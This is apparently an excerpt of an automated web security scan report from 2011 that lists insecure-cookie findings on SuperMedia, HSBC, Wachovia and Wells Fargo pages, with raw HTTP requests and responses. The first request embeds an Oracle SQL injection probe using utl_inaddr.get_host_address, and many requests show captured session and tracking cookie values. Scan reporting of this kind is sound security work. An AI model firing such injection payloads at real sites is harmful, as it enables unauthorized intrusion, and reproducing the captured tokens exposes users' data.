Path:   /spportal/spportalFlow.do

Issue detail

The following cookies were issued by the application and do not have the secure flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /spportal/spportalFlow.do?_flowExecutionKey=%27%7C%7C(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C%27 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.supermedia.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:00:04 GMT
Set-Cookie: JSESSIONID=288FFBAC45FB01B3489845E2C7FB3FFF.app3-a1; Path=/; Secure
Set-Cookie: trafficSource=default; Expires=Sat, 05-Mar-2011 18:59:58 GMT; Path=/
Set-Cookie: CstrStatus=U; Expires=Sat, 05-Mar-2011 18:59:58 GMT; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Set-Cookie: NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139e45525d5f4f58455e445a4a42378b;path=/
Content-Length: 19973


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<!-- UI framework designed and implemented by Advertiser Portal UI Team -->

<title>SuperPages
...[SNIP]...

10.140. https://www.us.hsbc.com/1/2/3/hsbcpremier/contact-us-form

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.us.hsbc.com
Path:   /1/2/3/hsbcpremier/contact-us-form

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/2/3/hsbcpremier/contact-us-form HTTP/1.1
Host: www.us.hsbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 17:09:13 GMT
Server: IBM_HTTP_Server
Cache-Control: private
Cache-Control: max-age=60
Expires: Thu, 03 Feb 2011 17:10:13 GMT
Vary: User-Agent,Cookie
Set-Cookie: USIB2G=0000iCqR-0svBcJPMWNx9j9Jai6:14k1jbteq; Path=/
Set-Cookie: CAMToken=zT+vap32WY2QfMIaqlxOBx3iIU4=; Path=/1; Secure
S: hbus-vh502_1
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en
Content-Length: 34157

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">


   <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <meta http-equiv="Content-Type" content="
...[SNIP]...

10.141. https://www.us.hsbc.com/1/2/3/personal/online-services/personal-internet-banking/log-on

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.us.hsbc.com
Path:   /1/2/3/personal/online-services/personal-internet-banking/log-on

Issue detail

The following cookies were issued by the application and do not have the secure flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /1/2/3/personal/online-services/personal-internet-banking/log-on HTTP/1.1
Host: www.us.hsbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 17:09:09 GMT
Server: IBM_HTTP_Server
Cache-Control: private
Cache-Control: max-age=60
Expires: Thu, 03 Feb 2011 17:10:09 GMT
Vary: User-Agent,Cookie
Set-Cookie: USIB2G=0000RrQWzP_uaKImrSDJuRHMmav:14k1jbteq; Path=/
Set-Cookie: CAMToken=8yJSFvsmfjijg6MsjugN571fSOU=; Path=/1; Secure
Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/
Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/
Set-Cookie: SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; Expires=Tue, 02 Feb 2016 17:09:09 GMT; Path=/
S: hbus-vh502_1
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en
Content-Length: 27426

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">


   <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <meta http-equiv="Content-Type" content=
...[SNIP]...

10.142. https://www.wachovia.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wachovia.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.wachovia.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_visit%3D1%7C1296685910831%3B%20s_ev33%3D%255B%255B%2527Direct%252520Load%2527%252C%25271296684110831%2527%255D%255D%7C1454450510831%3B%20s_nr%3D1296684110831-New%7C1328220110831%3B

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 13:17:33 GMT
Server: IBM_HTTP_Server
Set-Cookie: TLTSID=F64AE9222F97102F0FF6CD68BE2C558E; Path=/; Domain=.wachovia.com
Last-Modified: Thu, 20 Jan 2011 00:00:08 GMT
Accept-Ranges: bytes
Cache-Control: max-age=-47845
Expires: Thu, 03 Feb 2011 00:00:08 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Keep-Alive: timeout=10, max=45
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 26584

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Wachovia - Person
...[SNIP]...

10.143. https://www.wellsfargo.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; wcmcookiewf=dcZwNKrJNgvQcRKGLzpGdytBFd2Gb39LnVnzTPHpzy7DGKcT5CvJ!-605001729; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; NSC_XfmmtGbshp4=445b32077863; dm=DMIWEWAC02; ISD_WCM_COOKIE=1346509834.16927.0000; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Thu, 03 Feb 2011 13:19:51 GMT
Content-type: text/html;charset=UTF-8
Cache-control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-cookie: JSESSIONID=BC8AFB9D09E6CFB6400171C92F8B73FF;Path=/;Secure
Set-cookie: OB_SO_ORIGIN=source%3Dhomepage;Domain=.wellsfargo.com;Path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">


<head
...[SNIP]...

10.144. https://www.wellsfargo.com/about/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /about/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /about/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; wcmcookiewf=dcZwNKrJNgvQcRKGLzpGdytBFd2Gb39LnVnzTPHpzy7DGKcT5CvJ!-605001729; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; NSC_XfmmtGbshp4=445b32077863; dm=DMIWEWAC02; ISD_WCM_COOKIE=1346509834.16927.0000; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Thu, 03 Feb 2011 13:21:18 GMT
Content-type: text/html;charset=UTF-8
Cache-control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-cookie: OB_SO_ORIGIN=source%3Dhomepage;Domain=.wellsfargo.com;Path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">


<head
...[SNIP]...

10.145. https://www.wellsfargo.com/jump/wachovia/EFS/WAC1

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /jump/wachovia/EFS/WAC1

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /jump/wachovia/EFS/WAC1 HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Thu, 03 Feb 2011 13:18:06 GMT
Content-length: 6663
Content-type: text/html; charset=UTF-8
Set-Cookie: v1st=D79A86BB09726090; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.wellsfargo.com
Set-Cookie: wcmcookiewf=9Y9TNKrNTWk2JnNMkPVnKGhDp2j4zyC9VsGL93xRQLJBhcvhm52p!1650288205; domain=.wellsfargo.com; path=/; secure
Set-Cookie: wfacookie=B-20110203051805545407416; domain=.wellsfargo.com; expires=Sunday, 31-Jan-2021 13:18:06 GMT; path=/
Set-Cookie: ISD_WCM_COOKIE=1094851594.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java
...[SNIP]...

10.146. https://www.wellsfargo.com/jump/wachovia/insurance/identity

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /jump/wachovia/insurance/identity

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /jump/wachovia/insurance/identity HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Thu, 03 Feb 2011 13:18:06 GMT
Content-length: 6816
Content-type: text/html; charset=UTF-8
Set-Cookie: v1st=9E7CC77021B9627A; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.wellsfargo.com
Set-Cookie: wcmcookiewf=r345NKrTV0hcMDLvR0D6nTptLqh61g2NY6WPhxVLl5YGF55KM7NP!-830141515; domain=.wellsfargo.com; path=/; secure
Set-Cookie: wfacookie=B-201102030518061747192016; domain=.wellsfargo.com; expires=Sunday, 31-Jan-2021 13:18:06 GMT; path=/
Set-Cookie: ISD_WCM_COOKIE=1463950346.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java
...[SNIP]...

10.147. https://www.wellsfargo.com/jump/wachovia/mortgage/firsttimebuyer

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /jump/wachovia/mortgage/firsttimebuyer

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /jump/wachovia/mortgage/firsttimebuyer?dm=DMIWEWACP5 HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Thu, 03 Feb 2011 13:18:04 GMT
Content-length: 5035
Content-type: text/html; charset=UTF-8
Set-Cookie: v1st=998C62FFEC92044F; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.wellsfargo.com
Set-Cookie: wcmcookiewf=GRByNKrMn2CzvJwvZT3Qqs6pdW0C4jrh1jglt6kpncGDnHYYw9Cp!-853430660; domain=.wellsfargo.com; path=/; secure
Set-Cookie: dm=DMIWEWACP5; domain=.wellsfargo.com; expires=Saturday, 05-Mar-2011 13:18:04 GMT; path=/
Set-Cookie: wfacookie=B-201102030518041994769205; domain=.wellsfargo.com; expires=Sunday, 31-Jan-2021 13:18:04 GMT; path=/
Set-Cookie: ISD_WCM_COOKIE=943856650.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java
...[SNIP]...

10.148. https://www.wellsfargo.com/locator/atm/search

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /locator/atm/search

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/atm/search HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Thu, 03 Feb 2011 13:18:25 GMT
Content-type: text/html; charset=ISO-8859-1
Set-Cookie: v1st=217C745260A2991F; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.wellsfargo.com
Cache-Control: no-cache="Set-Cookie"
Set-Cookie: wcmcookieloc=nL1PNKrBL0wGBfhtR4h5Q4xpncFdz2myKbnkQ7MlmFZ0TyyY2KcR!-397408820; domain=.wellsfargo.com; path=/; secure
Set-Cookie: wfacookie=B-201102030518251103942443; domain=.wellsfargo.com; expires=Sunday, 31-Jan-2021 13:18:25 GMT; path=/
Set-Cookie: ISD_WCM_COOKIE=859970570.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">


<head>

<title>Wells Fargo Locations<
...[SNIP]...

10.149. https://www.wellsfargo.com/mortgage/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /mortgage/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mortgage/?dm=DMIWEWAC02 HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; wcmcookiewf=dcZwNKrJNgvQcRKGLzpGdytBFd2Gb39LnVnzTPHpzy7DGKcT5CvJ!-605001729; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; NSC_XfmmtGbshp4=445b32077863; dm=DMIWEWAC02; ISD_WCM_COOKIE=1346509834.16927.0000; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Thu, 03 Feb 2011 13:21:13 GMT
Content-type: text/html; charset=UTF-8
Set-Cookie: dm=DMIWEWAC02; domain=.wellsfargo.com; expires=Saturday, 05-Mar-2011 13:21:13 GMT; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head>
<title>Mortgage Information .
...[SNIP]...

10.150. https://www.wellsfargo.com/mortgage/apply/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /mortgage/apply/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mortgage/apply/?dm=DMIWEWAC02 HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; wcmcookiewf=dcZwNKrJNgvQcRKGLzpGdytBFd2Gb39LnVnzTPHpzy7DGKcT5CvJ!-605001729; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; NSC_XfmmtGbshp4=445b32077863; dm=DMIWEWAC02; ISD_WCM_COOKIE=1346509834.16927.0000; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Thu, 03 Feb 2011 13:21:06 GMT
Content-length: 9767
Content-type: text/html; charset=UTF-8
Set-Cookie: dm=DMIWEWAC02; domain=.wellsfargo.com; expires=Saturday, 05-Mar-2011 13:21:06 GMT; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Wells Fargo Home Mortgage - Ap
...[SNIP]...

10.151. https://www.wellsfargo.com/mortgage/buy/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /mortgage/buy/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mortgage/buy/?dm=DMIWEWAC02 HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; wcmcookiewf=dcZwNKrJNgvQcRKGLzpGdytBFd2Gb39LnVnzTPHpzy7DGKcT5CvJ!-605001729; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; NSC_XfmmtGbshp4=445b32077863; dm=DMIWEWAC02; ISD_WCM_COOKIE=1346509834.16927.0000; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Thu, 03 Feb 2011 13:20:48 GMT
Content-length: 11844
Content-type: text/html; charset=UTF-8
Set-Cookie: dm=DMIWEWAC02; domain=.wellsfargo.com; expires=Saturday, 05-Mar-2011 13:20:48 GMT; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Wells Fargo Home Mortgage - Ho
...[SNIP]...

10.152. https://www.wellsfargo.com/mortgage/locations/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /mortgage/locations/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mortgage/locations/?dm=DMIWEWAC02 HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; wcmcookiewf=dcZwNKrJNgvQcRKGLzpGdytBFd2Gb39LnVnzTPHpzy7DGKcT5CvJ!-605001729; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; NSC_XfmmtGbshp4=445b32077863; dm=DMIWEWAC02; ISD_WCM_COOKIE=1346509834.16927.0000; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 302 Moved Temporarily
Server: KONICHIWA/1.0
Date: Thu, 03 Feb 2011 13:21:15 GMT
Content-type: text/html; charset=ISO-8859-1
X-Cnection: close
Location: https://www.wfhm.com/locations/index.jsp?dm=DMIWEWAC02
Set-Cookie: dm=DMIWEWAC02; domain=.wellsfargo.com; expires=Saturday, 05-Mar-2011 13:21:15 GMT; path=/
Connection: close

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://www.wfhm.com/locations/ind
...[SNIP]...

10.153. https://www.wellsfargo.com/mortgage/rates/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /mortgage/rates/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mortgage/rates/?dm=DMIWEWAC02 HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; wcmcookiewf=dcZwNKrJNgvQcRKGLzpGdytBFd2Gb39LnVnzTPHpzy7DGKcT5CvJ!-605001729; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; NSC_XfmmtGbshp4=445b32077863; dm=DMIWEWAC02; ISD_WCM_COOKIE=1346509834.16927.0000; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Thu, 03 Feb 2011 13:21:00 GMT
Content-type: text/html; charset=UTF-8
Set-Cookie: dm=DMIWEWAC02; domain=.wellsfargo.com; expires=Saturday, 05-Mar-2011 13:21:00 GMT; path=/
Content-Language: en
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Wells Fargo Home Mortgage - To
...[SNIP]...

10.154. https://www.wellsfargo.com/mortgage/refinance/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /mortgage/refinance/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mortgage/refinance/?dm=DMIWEWAC02 HTTP/1.1
Host: www.wellsfargo.com
Connection: keep-alive
Referer: https://www.wellsfargo.com/wachovia/mortgage/index?dm=DMIWEWAC02
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=EF949CC12A6233AB; wfacookie=B-201102021400581302177828; WFHOME=PER; TCID=0007ae71-98bc-bd52-84ae-888500000049; wcmcookiewf=dcZwNKrJNgvQcRKGLzpGdytBFd2Gb39LnVnzTPHpzy7DGKcT5CvJ!-605001729; dm=DMIWEWAC02; ISD_WCM_COOKIE=1346509834.16927.0000

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Thu, 03 Feb 2011 13:18:16 GMT
Content-type: text/html; charset=UTF-8
Set-Cookie: dm=DMIWEWAC02; domain=.wellsfargo.com; expires=Saturday, 05-Mar-2011 13:18:16 GMT; path=/
Content-Length: 12267


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Mortgage Refinancing ... Wells
...[SNIP]...

10.155. https://www.wellsfargo.com/tas

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /tas

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /tas HTTP/1.1
Host: www.wellsfargo.com
Connection: keep-alive
Referer: https://www.wellsfargo.com/wachovia/mortgage/index?dm=DMIWEWAC02
Origin: https://www.wellsfargo.com
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=EF949CC12A6233AB; wfacookie=B-201102021400581302177828; WFHOME=PER; TCID=0007ae71-98bc-bd52-84ae-888500000049; wcmcookiewf=dcZwNKrJNgvQcRKGLzpGdytBFd2Gb39LnVnzTPHpzy7DGKcT5CvJ!-605001729; dm=DMIWEWAC02; ISD_WCM_COOKIE=1346509834.16927.0000
Content-Length: 177

RequestType=Logging&pageURL=https%3A//www.wellsfargo.com/wachovia/mortgage/index%3Fdm%3DDMIWEWAC02&pageID=/wachovia/mortgage/index&tz=-360&r=https://www.wachovia.com/&App_ID=WWW

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Thu, 03 Feb 2011 13:18:05 GMT
Content-type: text/html
Set-cookie: TCID=0007ae71-98bc-bd52-84ae-888500000049;Domain=.wellsfargo.com;Expires=Sat, 02-Feb-2013 13:18:05 GMT;Path=/
Set-cookie: NSC_XfmmtGbshp4=445b32077863;Domain=.wellsfargo.com;Expires=Thu, 03-Feb-2011 17:18:05 GMT;Path=/
Content-Length: 0


10.156. https://www.wellsfargo.com/wachovia

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /wachovia

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /wachovia HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Thu, 03 Feb 2011 13:18:23 GMT
Content-length: 9975
Content-type: text/html; charset=UTF-8
Set-Cookie: v1st=CBD6C286D37D50C2; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.wellsfargo.com
Set-Cookie: wcmcookiewf=9hvNNKrff2pv13DmypVr4lVTfNsJfTP1JvR15S1vn8TkzKJ0ndyX!-2146108302; domain=.wellsfargo.com; path=/; secure
Set-Cookie: wfacookie=B-201102030518231332837520; domain=.wellsfargo.com; expires=Sunday, 31-Jan-2021 13:18:23 GMT; path=/
Set-Cookie: ISD_WCM_COOKIE=1648499722.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head>
<title>Wells Fargo and Wachov
...[SNIP]...

